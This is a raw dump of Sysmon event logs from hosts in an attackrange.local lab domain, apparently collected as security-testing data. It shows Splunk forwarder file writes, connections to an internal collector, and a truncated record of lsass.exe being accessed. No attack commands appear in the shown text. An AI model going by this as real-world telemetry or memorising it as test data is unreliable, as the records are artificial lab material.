23542300x8000000000000000245704Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:31.316{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=911AC1C26E49B4C45891292D92D958D9,SHA256=7A36646218631F27BD68E93D09BB5C81C7FEAA5D2C6447F837928218D0211A24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060985Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:32.852{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4018070F3AF34044FFEEC29D7F41FB,SHA256=985C6BAD2BCB9AF8E584A56DDE886509BBE4BE3098FD1267BAAB5D00899A7935,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245708Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:32.472{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6374458F753CAC6A146916D8A33C2F98,SHA256=88B0861826FA9B9C17976AD261A45513660051E07F4EF5D97CB3CCBAAAD3F422,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245707Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:30.528{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64765-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245709Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:33.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA05482DDD0288534D291C1F914F4045,SHA256=AF1D0DEF07A2A121FBF3854F65B6D1A2C22B71B9DD4C6272144053B03D7902A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060987Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:34.884{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CC2A07C8D024219BEDB197638A358E5,SHA256=AB682974982A924A71D63ACDD236A41421BC094133CBF3686E928BE4C77DFAEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060986Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:34.212{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AF2E31CA0024C5403F5E34CCCD02414,SHA256=22ACC97C8849B90806572192A2C9E8BA7CF3BA8210BD2D14AD8078CC92E29670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245710Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:34.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56D092E3D0F2DF2E36D4C48F8E80A32E,SHA256=3AB752CF9F1821B6F618329B2F7604E2231439EB3E70E1D67DB7E21443C66D1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060988Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:35.571{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3586AD685A163FF439EA65155E65334,SHA256=18DB863119B52A6F9DF0352FF8646717710B64B4F543EEA564E8F9E7A2163A96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245712Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:35.660{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D378E5DECF25148469E74116BA6AB5D6,SHA256=F42336C9EA791DC70EDBC3316885627F854B9E19B8FB2E85C5046539BE26DC3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245711Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:35.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DCB44CFD0ABA6A5F732D715A33B1B3A,SHA256=8647DD3F55BCA760A0FBC1F9711DC9C6B4C431B346F8DC7EB8599F6C5E8014EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060989Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:36.931{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36EE2AF13A50186AF6E8BC3AE14C18E0,SHA256=8A786C49347736949DA56EEE14798BDF7970F4BFF4ADFDD76F17B3F88DC137D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245713Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:36.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6D0F56692CFE9EA75E9C7007DCFA4FC,SHA256=E9002115AB8B7EEE3A07116BB9448FD2177361D95B1D8EC54A81E81071FD902D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245715Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:37.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C1C320FFA39F625AE00E932FA9B19D,SHA256=89B475F28BC126B60A90BD02BBA1037CEEFA4466514CC104F67B2812F4884108,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245714Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:35.575{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64766-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060991Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:38.290{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7819A3DE9C1A7F97FEB08AFA1A194A61,SHA256=98F83ACD08F389FD4ADAA37921E344488696E9ECABEB90C44692E538DF7802FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060990Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:34.857{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54780-false10.0.1.12-8000- 23542300x8000000000000000245716Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:38.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6966F9651C73BC5B0F49B0BD74802F92,SHA256=BDFE87DBBD265DA1BA37C1F02F0662C909A77A7769DABDD2E506AC25445F09B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060992Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:39.650{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD25D44DBDD3B6FF747231B9268BCE32,SHA256=6296A718049130ECD7F07096C612B051584E24C87169C17F47694862A45964E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245717Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:39.519{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA86C11AD60EB458D1EE5A01E0BAFE4,SHA256=D2D9C62D1033335CD20FA68D935AA6FE39132E4052F88F57D965F1A8F051530D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245718Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:40.581{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D88C61365243D079AA6D5683DAAEE3B,SHA256=B09F69FD33B3695F34F55579A7AE9BBC5C73333253186ADB8C6A51CDF7E87617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060993Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:41.025{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B675A599C6D00FE5BDF8B3AC8639A7FE,SHA256=3C261609EFB7F6CC794FC98EA7FD4678D2BA62A20BE42D37284129E1B1C51179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245721Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:41.581{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC273023F461DC9490539C5E45C554B2,SHA256=14D7E82F3131F462AB4F83A774BC35EAC196A4BC81F00AF6A681FDF7B40E9AAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245720Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:41.347{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACAD3AF5EBE7EA8280DF37A00F0DEF1F,SHA256=D691037FC550C077B5799C535A203A268B903832C8E2077C0B2DAB365DE76F39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245719Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:41.347{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54CDE8A0F572B7A222B57F424C90AE4A,SHA256=CA42369FFAB83302B2A2E43270C7F56480B0B16518E4BBD8F40150ACA7DB9611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060994Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:42.385{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B2CF753DA59A862AACAD56023532DF6,SHA256=7261F1114D53E1D69B42CDAE80F0AC3AB628F689CF0037CEEE42BB98BE42F0A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245723Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:42.613{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D29A0BC3693BBBC6D829C4DCB792ECB,SHA256=174267DB62BDE26E1201D7EACDB0EBAB02F219B0E0C3544D17B7A102A0C95475,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245722Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:40.606{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64767-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x80000000000000001060995Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:40.076{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54781-false10.0.1.12-8000- 23542300x8000000000000000245724Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:43.660{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C663D737BCFD5A043555811951A75556,SHA256=3E2BAA21FD59CC05066F5D13B58C1867A168A8040336EE59DC54F1C51F1832DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060996Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:44.385{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2D1D511B4F4E73F102AB855DC23968,SHA256=F2928D6A3A4833896212D575B901B3618D205F7A6C8F87A0F140E08227A29535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245725Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:44.660{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FD8DDF8ED1C357F602623A3FE08C32,SHA256=A5F52861D244AA96D807EE790DEB028F8B4337FF75E577A8EB3060821D093877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245726Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:45.660{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3714AC021208492BD659AC8E36ADA62E,SHA256=E7692C7E5135C016FA8A7478358F02E7F207EA1FFBA3EDD07BAA53F18682BE62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060998Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:46.057{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFCF036AF7654B6C435A3C7B7F6C2E15,SHA256=A9D0CAA556B7CE1335CC36C1016124D89DD0C794DA3F012627A6FA1339C4C77F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060997Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:46.057{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5945183D744C51565DB61027183BF604,SHA256=C24D2DFEBBD9C05305009F7CABFEFC34109BA38959CA88A83879BA2E90C6A36D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245728Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:46.675{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0BB3FFEC3CF24E5BCB6DB370B94F5A,SHA256=61D05BCFC1123A01FEA09E110A99CA7F0AD9F62DCE723CC397AC5632B591D3E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245727Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:46.238{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACAD3AF5EBE7EA8280DF37A00F0DEF1F,SHA256=D691037FC550C077B5799C535A203A268B903832C8E2077C0B2DAB365DE76F39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060999Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:47.417{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5BA89F7D483068E488930EF4337C554,SHA256=76F5D55B598377087C750B8738E34CB98F842407FEE56E614017BFE3CE5926B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245730Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:47.675{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607A00EAAEF43A05150565080C941248,SHA256=79B3D103AB1A50185806DD36F5AB81C2E673A61E96AC6AF917A289CFD2C5FAD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245729Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:45.669{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64768-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061000Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:48.776{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB02697EA8E8F1BDAB971E8535EA9DB6,SHA256=0D27509D28D7116463E5C08346620608EE54C2F4D195BA27FE4E2E21238D5815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245731Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:48.706{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26F649A91D320AF1AF9227BBBFF9E973,SHA256=C4444B11FCA47DB67090824B4E6667409326A6F739CE57B76D1FEADEAE9490C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061001Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:45.951{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54782-false10.0.1.12-8000- 23542300x8000000000000000245732Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:49.770{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62293FC9300ED316F3E0D86D2A57DAD7,SHA256=CF7BD4C64618EA2C267E5D4ACF8D0EAC0C1D781F5BD482B4D4CDB94684CE2BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061003Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:50.214{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C435637D8C63D60DE66AC6E9F7B2ADE3,SHA256=9A736F92B8110254C3F9CE5F0AE3BEF01F96556E38D5DC9AC4A0A6B435FF0B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061002Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:50.136{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15ACB45AC887A221D09A6BC5D77C3DD,SHA256=407D3F586603C6D4413682E56E765F15590C93C167403432647C8CDA49A7420A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245734Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.896{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3B08EDF059316E70375460411110A13,SHA256=0F5AC916DBBE489C2EB400C32B903D93778C2B19813CA9BB19B1F6C01BAA44AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245733Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.818{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBBE11FE0303356C41DF5CA5779DE6D8,SHA256=BF4091F6672A1C0B14C7CBE851189AC342598DAEF57F6E0412B175D44D204B3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061008Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:51.495{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB164E074041951515E933F66C18DAED,SHA256=8C0342100AA83D1CC72C2021A925099EAC57C7FDDD231BCE5053DF7C747B9EC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061007Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:51.058{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061006Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:51.011{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3D-6063-2100-00000000AF01}1636C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windo